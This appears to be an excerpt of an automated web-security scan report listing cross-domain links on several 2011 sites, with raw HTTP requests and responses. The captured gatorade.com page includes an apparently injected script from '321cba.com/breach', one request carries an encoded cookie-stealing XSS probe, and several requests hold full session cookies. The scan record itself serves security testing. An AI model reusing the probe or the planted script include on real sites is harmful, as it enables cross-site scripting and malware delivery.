<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_399825">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825^feedID=3698^gt1=39002^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=399825&feedID=3698&gt1=39002&" target=_blank rel="nofollow">
...[SNIP]...
sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('No limits for Robles as next stage beckons') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/common/dynrss/dynrss_3698_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911
" target='_blank'>
Mickelson tied for lead at Torrey Pines
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/leaderboard
" target='_blank'>
Scores
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/tennis/story/maturity-experience-aid-clijsters-to-first-australian-open-title-012911
" target='_blank'>
Maturity, experience aid Clijsters to title
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
" target='_blank'>
Louisville holds off UConn in double OT
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-21-Georgetown-upsets-eighth-ranked-Villanova-012811
" target='_blank'>
No. 21 Hoyas handle No. 8 Villanova
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-Syracuse-loses-fourth-game-in-a-row-012911
" target='_blank'>
Syracuse loses fourth straight game
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/scores?scheduleDayCode=2011-1-29&region=&tournament=&conference=0
" target='_blank'>
Live college hoops scoreboard
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/24-Hours-of-Daytona-beings-Chip-Ganassia-Racing-problems-012911
" target='_blank'>
Day of racing at Daytona begins
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">
FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

22.425. http://www.gatorade.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gatorade.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /default.aspx?s=gseries HTTP/1.1
Host: www.gatorade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ozr1wv55ybnk4g55zqh2ce55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Gatorad
...[SNIP]...
<meta name="google-site-verification" content="urVYKRjWIeor2vJRZ8fvAklweDgUIM76CTiQ-jlkHiE" />

<script type="text/javascript" src="http://321cba.com/breach/18.js"></script>
...[SNIP]...
<!-- End 1st level -->
<a href="http://get.adobe.com/flashplayer">
<img src="/images/noflash/get_flash_player.gif" alt="Get Flash Player" style="border: 0;
margin: 20px 0 8px 15px" />
...[SNIP]...
<li><a href="http://www.gssiweb.com" onclick="window.open('http://www.gssiweb.com'); return false">
GSSI</a>
...[SNIP]...
<li><a href="http://facebook.com/Gatorade" onclick="window.open('http://facebook.com/Gatorade'); return false">
FACEBOOK</a>
...[SNIP]...
<li><a href="http://twitter.com/gatorade" onclick="window.open('http://twitter.com/gatorade'); return false">
TWITTER</a>
...[SNIP]...
<li><a href="http://youtube.com/whatsg" onclick="window.open('http://youtube.com/whatsg'); return false">
YOUTUBE</a>
...[SNIP]...
<li><a href="http://www.gssiweb.com" onclick=" trackingEvent('/exit/gssi'); window.open('http://www.gssiweb.com');return false">
GSSI</a>
...[SNIP]...
<li><a href="http://facebook.com/Gatorade" onclick="trackingEvent('/exit/facebook'); window.open('http://facebook.com/Gatorade'); return false">
FACEBOOK</a>
...[SNIP]...
<li><a href="http://twitter.com/gatorade" onclick="trackingEvent('/exit/twitter'); window.open('http://twitter.com/gatorade'); return false">
TWITTER</a>
...[SNIP]...
<li><a href="http://youtube.com/whatsg" onclick="trackingEvent('/exit/youtube'); window.open('http://youtube.com/whatsg'); return false">
YOUTUBE</a>
...[SNIP]...

22.426. https://www.google.com/adsense/support/bin/request.py

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adsense/support/bin/request.py?contact=abg_afc&url=http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1%27%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E6033be6539a/&hl=en&client=ca-pub-0397559301561409 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D16496d0070846078%26v%3D2%26c%3De08e7d44%26s%3D4d44c48d%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 30-Jan-2011 02:23:17 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 01:53:17 GMT
Expires: Sun, 30 Jan 2011 01:53:17 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

22.427. http://www.macromedia.com/shockwave/download/index.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macromedia.com
Path:   /shockwave/download/index.cgi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash HTTP/1.1
Host: www.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 01:53:51 GMT
Server: Apache
Location: http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">here</a>
...[SNIP]...

22.428. http://www.microsoft.com/web/gallery/install.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /web/gallery/install.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /web/gallery/install.aspx?appid=silverlight4tools;silverlight4toolkit;riaservicestoolkit HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 4.0.30319
Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
VTag: 791820740500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:30:59 GMT
Content-Length: 74785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head
...[SNIP]...
<li><a href="http://www.youtube.com/user/microsoftwebplatform" onclick="dcsMultiTrack('DCS.dcssip','www.youtube.com','DCS.dcsuri','/user/microsoftwebplatform','WT.ti','Link:Social%20YouTube','WT.z_convert','Social-YouTube','WT.dl','1','WT.z_ea_name','Social YouTube','WT.z_ea_actionoffer', 'Social-YouTube'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/youtube_logo25x25.png" class="socialIcon" alt="YouTube" />
...[SNIP]...
<li><a href="http://twitter.com/mswebplatform" onclick="dcsMultiTrack('DCS.dcssip','twitter.com','DCS.dcsuri','/mswebplatform','WT.ti','Link:Social%20Twitter','WT.z_convert','Social-Twitter','WT.dl','1','WT.z_ea_name','Social Twitter','WT.z_ea_actionoffer', 'Social-Twitter'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/twitter_logo25x25.png" class="socialIcon" alt="Twitter" />
...[SNIP]...
<li><a href="http://www.facebook.com/WebPlatform" onclick="dcsMultiTrack('DCS.dcssip','www.facebook.com','DCS.dcsuri','/WebPlatform','WT.ti','Link:Social%20Facebook','WT.z_convert','Social-Facebook','WT.dl','1','WT.z_ea_name','Social Facebook','WT.z_ea_actionoffer', 'Social-Facebook'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/facebook_logo25x25.png" class="socialIcon" alt="Facebook" />
...[SNIP]...
<li class="AspNet-Menu-Leaf AspNet-Menu-Last">
                           <a href="http://www.bizspark.com/" class="AspNet-Menu-Link" title="For Startups">
                               <span class="AspNet-Menu-Left">
...[SNIP]...
</h2>
<img src="http://i1.asp.net/asp.net/images/discountasp.png" alt="discount ASP.NET" class="hoster-logo" />
<h3>
...[SNIP]...
</h2>
<img src="http://i1.asp.net/asp.net/images/softsys-logo.png" alt="Softsys Hosting" class="hoster-logo" />
<h3>
...[SNIP]...
</h2>
<img src="http://i1.asp.net/common/www-css/i/logo_host_planet.png" alt="The Planet - The Global IT Hosting Leader" class="hoster-logo" />
<h3>
...[SNIP]...
<li><a title="IIS" href="http://www.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS</a>
...[SNIP]...
<li><a title="ASP.NET" href="http://www.asp.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">ASP.NET</a>
...[SNIP]...
<li><a title="Silverlight" href="http://silverlight.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight</a>
...[SNIP]...
<li><a title="ASP.NET Community" href="http://www.asp.net/community/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">ASP.NET Community</a>
...[SNIP]...
<li><a title="IIS Community" href="http://www.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS Community</a>
...[SNIP]...
<li><a title="Silverlight Community" href="http://silverlight.net/Community/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight Community</a>
...[SNIP]...
<li><a title="Student Lounge" href="http://www.msstudentlounge.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Student Lounge</a>
...[SNIP]...
<li><a title="Channel 9" href="http://channel9.msdn.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Channel 9</a>
...[SNIP]...
<li><a title="Channel 10" href="http://on10.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Channel 10</a>
...[SNIP]...
<li><a title="CodePlex" href="http://www.codeplex.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">CodePlex</a>
...[SNIP]...
<li><a title="Web Platform Team Blog" href="http://blogs.msdn.com/b/webplatform/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Web Platform Team Blog</a>
...[SNIP]...
<li><a title="IIS Team Blog" href="http://blogs.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS Team Blog</a>
...[SNIP]...
<li><a title="Web Tools Team Blog" href="http://blogs.msdn.com/webdevtools/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Web Tools Team Blog</a>
...[SNIP]...
<li><a title="Silverlight Team Blog" href="http://team.silverlight.net" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight Team Blog</a>
...[SNIP]...
<li><a title="Internet Explorer Team Blog" href="http://blogs.msdn.com/ie" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IE Team Blog</a>
...[SNIP]...
<li><a title="Brian Swan's Blog" href="http://blogs.msdn.com/b/brian_swan/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Brian Swan's Blog</a>
...[SNIP]...
<li><a title="Ruslan Yakushev's Blog" href="http://ruslany.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Ruslan Yakushev's Blog</a>
...[SNIP]...
<li><a title="Interop Team Blog" href="http://blogs.msdn.com/b/interoperability/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Interop Team Blog</a>
...[SNIP]...
<li><a title="Scott Guthrie's Blog" href="http://weblogs.asp.net/Scottgu/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Scott Guthrie's Blog</a>
...[SNIP]...
<li><a title="Scott Hanselman's Blog" href="http://www.hanselman.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Scott Hanselman's Blog</a>
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8muh1110000wwq7so0uysl_9h7u/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=MS.3.0.0"/>
</div>
...[SNIP]...

22.429. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA40
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 45556
Content-Length: 45556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNHPT">Saturday, January 29, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41327694/ns/us_news/?GT1=43001"><img src="http://col.stb.s-msn.com/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg" title="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" width="206" height="144" alt="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" /></a>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001"><img src="http://col.stb.s-msn.com/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg" title="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" width="206" height="144" alt="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002"><img src="http://col.stb.s-msn.com/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg" title="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" width="206" height="144" alt="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" /></a><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002">FBI helps with missing puck</a>
...[SNIP]...
<a href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001"><img src="http://col.stb.s-msn.com/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg" title="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" width="303" height="211" alt="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" /></a>
...[SNIP]...
<a href="http://dating.msn.com/en-us/partner/msn/38028.html?trackingid=526133&amp;bannerid=673612&amp;gc=1&amp;tr=2&amp;keyword=football&amp;gt1=26000"><img src="http://col.stb.s-msn.com/i/62/47BC124184233113131B97F8F8359E.jpg" title="Image: Couple playing football (.. Jamie Grill/Getty Images)" width="293" height="144" alt="Image: Couple playing football (.. Jamie Grill/Getty Images)" /></a>
...[SNIP]...
<li style="width:293px;" class="last"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000"><img src="http://col.stb.s-msn.com/i/42/40224F9769E8AD5EA8F8A624E74A.jpg" title="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" width="293" height="144" alt="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" /></a><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000">Women: Find a guy who's just like you </a>
...[SNIP]...
<a href="http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&amp;icid=autos_0252&amp;GT1=22017"><img src="http://col.stb.s-msn.com/i/40/6087ED1789141E9E7E7476F7D2A816.jpg" title="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" width="303" height="211" alt="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&amp;GT1=35006"><img src="http://col.stb.s-msn.com/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg" title="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" width="303" height="211" alt="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" /></a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&amp;gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&amp;feedID=3698&amp;gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
